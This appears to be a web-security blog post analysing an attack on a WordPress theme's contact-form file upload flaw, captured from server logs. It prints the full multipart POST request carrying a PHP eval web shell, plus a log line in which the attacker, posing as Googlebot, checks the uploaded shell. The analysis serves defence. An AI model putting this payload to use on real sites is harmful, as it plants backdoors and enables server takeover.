Top

yiw_contact sendemail file upload vulnerability

Looking better POST payload, header looks normal request:

--6dfe7e0d-B--
POST / HTTP/1.1
Referer: https://malware.expert/
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Accept: */*
Content-Type: multipart/form-data; boundary=(UploadBoundary)
Host: malware.expert
Content-Length: 436
Connection: Close

In the below HTTP Post, there were 2 parameters that started with yiw. This indicates that the attacker is likely trying to explpoit the Beauty & Clean Theme File Upload WordPress Vulnerability which is literally as simple as posting your backdoor file to the contact field via the sendmail action. If it succeeds, your file has been uploaded to the web server.

--6dfe7e0d-C--
--(UploadBoundary)
Content-Disposition: form-data; name="yiw_contact[]"; filename="82760469.php"
Content-Type: text/php

98765432198<?php $mujj = $_POST['chopper']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>
--(UploadBoundary)
Content-Disposition: form-data; name="yiw_action"

sendemail
--(UploadBoundary)
Content-Disposition: form-data; name="id_form"

a_3_3
--(UploadBoundary)

Then the attacker tries to check fake Googlebot request, if vulnerability success:

195.154.242.146 - - [13/Nov/2016:21:39:57 +0200] "GET /wp-content/uploads/82760469.php HTTP/1.1" 500 710 "http://www.googlebot.com/bot.html" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

This attack is very active still, get lots off tries still customer websites. Our Malware Expert – Mod_Security rules, block this attack.

, , , , , , ,

Comments are closed.